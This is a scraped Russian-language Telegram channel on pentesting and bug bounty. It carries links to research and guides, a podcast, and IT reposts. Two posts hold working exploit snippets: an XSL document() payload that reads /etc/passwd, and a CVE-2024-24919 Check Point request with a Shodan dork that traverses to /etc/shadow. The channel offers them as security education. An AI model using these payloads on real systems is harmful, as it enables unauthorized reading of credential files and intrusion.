🤑 $28 000 за 0-day, который помог найти ChatGPT
🧀 В чем сыр-бор? Исследователь из PT SWARM выявил, что помимо XML современные браузеры поддерживают еще много форматов, включая старый добрый XSL. О том, что там тоже можно объявлять внешние сущности любезно напомнил ChatGPT. Дальше — дело техники.
👉 Подробнее о баге с пруфами и другими деталями читайте в статье автора
#writeup #pentest #bugbounty
🧀 В чем сыр-бор? Исследователь из PT SWARM выявил, что помимо XML современные браузеры поддерживают еще много форматов, включая старый добрый XSL. О том, что там тоже можно объявлять внешние сущности любезно напомнил ChatGPT. Дальше — дело техники.
<xsl:copy-of select="document('file:///etc/passwd')"/>
👉 Подробнее о баге с пруфами и другими деталями читайте в статье автора
#writeup #pentest #bugbounty
❤8🔥6👍3
🤔13👍4
🎙️ Подкаст Just Security: путь исследователя
Путь исследователя на примере Павла Топоркова (Paul Axe) — независимого исследователя, докладчика на международных конференциях, участника одной из сильнейших мировых команд CTF, автора 0-day уязвимостей в Siemens, Redis, OpenStack и других продуктах.
⏱️ Таймкоды:
00:00 — Бэкграунд Павла
2:40 — Сложные кейсы Павла
6:10 — CTF
6:13 — Как CTF помогли начать карьеру
13:29 — Как определить свой вектор развития
16:50 — Ресерчи, которые вдохновляют
20:37 — Что драйвит в работе
23:17 — Команда CTF в которой играет Павел
29:42 — Как опыт CTF помогает в работе и поиске тем для исследований
36:10 — Практический опыт нестандартных эксплуатаций
37:41 — Почему Павел не багхантер, хотя багхантил
42:05 — Исследование OpenStack
46:00 — Сериализация и десериализация
51:40 — Доклад oPWNstack
53:47 — Когда ИИ заменит ИБ-специалистов
1:01:00 — Как стать таким же крутым Paul Axe
1:06:00 — Выгорание
1:09:00 — Отличия зарубежного и российского ИБ
1:18:00 — Сертификация специалистов
⏯ Youtube | VK | Яндекс Музыка | Apple podcast
#podcast #pentest #bugbounty #podcasts
Путь исследователя на примере Павла Топоркова (Paul Axe) — независимого исследователя, докладчика на международных конференциях, участника одной из сильнейших мировых команд CTF, автора 0-day уязвимостей в Siemens, Redis, OpenStack и других продуктах.
⏱️ Таймкоды:
00:00 — Бэкграунд Павла
2:40 — Сложные кейсы Павла
6:10 — CTF
6:13 — Как CTF помогли начать карьеру
13:29 — Как определить свой вектор развития
16:50 — Ресерчи, которые вдохновляют
20:37 — Что драйвит в работе
23:17 — Команда CTF в которой играет Павел
29:42 — Как опыт CTF помогает в работе и поиске тем для исследований
36:10 — Практический опыт нестандартных эксплуатаций
37:41 — Почему Павел не багхантер, хотя багхантил
42:05 — Исследование OpenStack
46:00 — Сериализация и десериализация
51:40 — Доклад oPWNstack
53:47 — Когда ИИ заменит ИБ-специалистов
1:01:00 — Как стать таким же крутым Paul Axe
1:06:00 — Выгорание
1:09:00 — Отличия зарубежного и российского ИБ
1:18:00 — Сертификация специалистов
⏯ Youtube | VK | Яндекс Музыка | Apple podcast
#podcast #pentest #bugbounty #podcasts
👍5🥱2❤1
У команды Assetnote очередной крутой ресёрч. В новой статье рассматривается потенциальная возможность возникновения SSRF в приложениях NextJS из-за неправильных конфигураций.
В частности, основное внимание уделяется компоненту
_next/image и демонстрируется, как злоумышленники могут использовать эти слабые места для выполнения SSRF-атак, включая подробное объяснение обхода мер безопасности и недавно обнаруженной SSRF-уязвимости, которой был присвоен CVE-2024-34351.👉 Читать
#pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰4🔥2
Please open Telegram to view this post
VIEW IN TELEGRAM
phdays.com
Positive Hack Days
An international cyberfestival for those who want to dive into the world of cybersecurity and have a great time
👾2
📌 Подробная шпаргалка по поиску и эксплуатации SQL-инъекций, которая должна быть в ваших закладках.
👉 Перейти к шпаргалке
#cheatsheet
👉 Перейти к шпаргалке
#cheatsheet
👍7🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍4
Измените тип контента с application/json на text/plain и посмотрите, принимает ли он по-прежнему запрос 🥷
#bugbounty #tips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥3
🥷 Пентест gRPC: гайд для этичного хакера
Гайд поможет разобраться в том, как тестировать веб-приложения, использующие gRPC. Содержание частично пересекается с докладом автора на OFFZONE 2023, но с упором на практический пример по поиску уязвимостей на демонстрационном стенде с использованием Burp Suite и расширения prototbuf-magic.
👉 Читать
#pentest #bugbounty
Гайд поможет разобраться в том, как тестировать веб-приложения, использующие gRPC. Содержание частично пересекается с докладом автора на OFFZONE 2023, но с упором на практический пример по поиску уязвимостей на демонстрационном стенде с использованием Burp Suite и расширения prototbuf-magic.
👉 Читать
#pentest #bugbounty
Forwarded from Библиотека дата-сайентиста | Data Science, Machine learning, анализ данных, машинное обучение
💸📊 На сколько просели зарплаты в ИТ в 2024 году?
Благодаря открытым данным с сайта Хабр Карьера мы узнали, какие основные тенденции ждать в зарплатном секторе, и сколько получают ИТ-специалисты сейчас.
🤔 Например, в первом полугодии 2023 года в среднем джунам предлагали 80 тысяч рублей, а спустя год это число упало до 72,5 тысячи рублей.
👉 Остальные данные — в статье
👉 Зеркало
Благодаря открытым данным с сайта Хабр Карьера мы узнали, какие основные тенденции ждать в зарплатном секторе, и сколько получают ИТ-специалисты сейчас.
🤔 Например, в первом полугодии 2023 года в среднем джунам предлагали 80 тысяч рублей, а спустя год это число упало до 72,5 тысячи рублей.
👉 Остальные данные — в статье
👉 Зеркало
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
🥷 Изучение необычных методов атаки на NTLM relay
Под катом вас ждет пять векторов атак на NTLM relay, о которых мало говорят:
1️⃣ Enumerating Domain Usernames via a Non-Admin SMB Relay
2️⃣ Relaying to Microsoft SQL Server
3️⃣ Relaying to LDAP and Configuring Resource-Based Delegation
4️⃣ Shadow Credentials Attack with no Prior Credentials
5️⃣ Shadow Credentials Attack Using Prior Credentials
#pentest #redteam
Под катом вас ждет пять векторов атак на NTLM relay, о которых мало говорят:
#pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
GuidePoint Security
Beyond the Basics: Exploring Uncommon NTLM Relay Attack Techniques
Threat & Attack Simulation Technical Lead Kevin Murphy details 5 lesser-known NTLM relay attacks that have to help you penetration test your networks.
🔥2
Все пишут про CVE-2024-24919, и мы напишем.
🔍 Дорк для Shodan:
Эксплуатация👇
#CVE
title:"Check Point" ssl:"target"Эксплуатация👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Библиотека программиста | программирование, кодинг, разработка
🐳✈️ Docker ушёл из РФ! Инструкция по восстановлению доступа к Docker Hub для пользователей из России
Docker заблокировал доступ к своему главному репозиторию Docker Hub для пользователей из России. Однако есть способы обойти это ограничение и продолжить работу. В этом посте мы расскажем, как настроить альтернативные репозитории и зеркала.
🔗 Читать статью
🔗 Зеркало
Docker заблокировал доступ к своему главному репозиторию Docker Hub для пользователей из России. Однако есть способы обойти это ограничение и продолжить работу. В этом посте мы расскажем, как настроить альтернативные репозитории и зеркала.
🔗 Читать статью
🔗 Зеркало
🥱7❤2👍1😁1😢1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
Forwarded from Библиотека программиста | программирование, кодинг, разработка
💻⌛ 8 причин участвовать в хакатонах
Давно мечтали попробовать что-нибудь новое в своей жизни, но обойтись без экстремальных ощущений? Тогда хакатоны — это то, что вам нужно!
👉 Читать статью
👉 Зеркало
📌 Другие материалы по теме:
💻🚀🏰 Как мы создали ИИ-стартап на хакатоне выходного дня в Германии
🔥 12 признаков выгорания или как понять, что вам пора в отпуск
🏆 Как принять участие в хакатоне и занять призовое место. Инструкция для начинающих программистов
🤝 5 soft skills, которые помогут тебе дорасти до Senior-разработчика
Давно мечтали попробовать что-нибудь новое в своей жизни, но обойтись без экстремальных ощущений? Тогда хакатоны — это то, что вам нужно!
👉 Читать статью
👉 Зеркало
📌 Другие материалы по теме:
💻🚀🏰 Как мы создали ИИ-стартап на хакатоне выходного дня в Германии
🔥 12 признаков выгорания или как понять, что вам пора в отпуск
🏆 Как принять участие в хакатоне и занять призовое место. Инструкция для начинающих программистов
🤝 5 soft skills, которые помогут тебе дорасти до Senior-разработчика
❤2👍2🔥1